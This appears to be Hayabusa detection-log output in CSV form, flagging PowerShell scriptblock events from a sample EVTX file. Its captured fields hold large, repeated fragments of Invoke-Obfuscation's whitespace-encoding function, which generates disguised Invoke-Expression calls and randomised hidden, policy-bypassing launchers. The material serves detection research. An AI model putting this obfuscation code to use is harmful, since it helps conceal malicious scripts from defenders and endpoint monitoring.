([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. $NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + "",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += 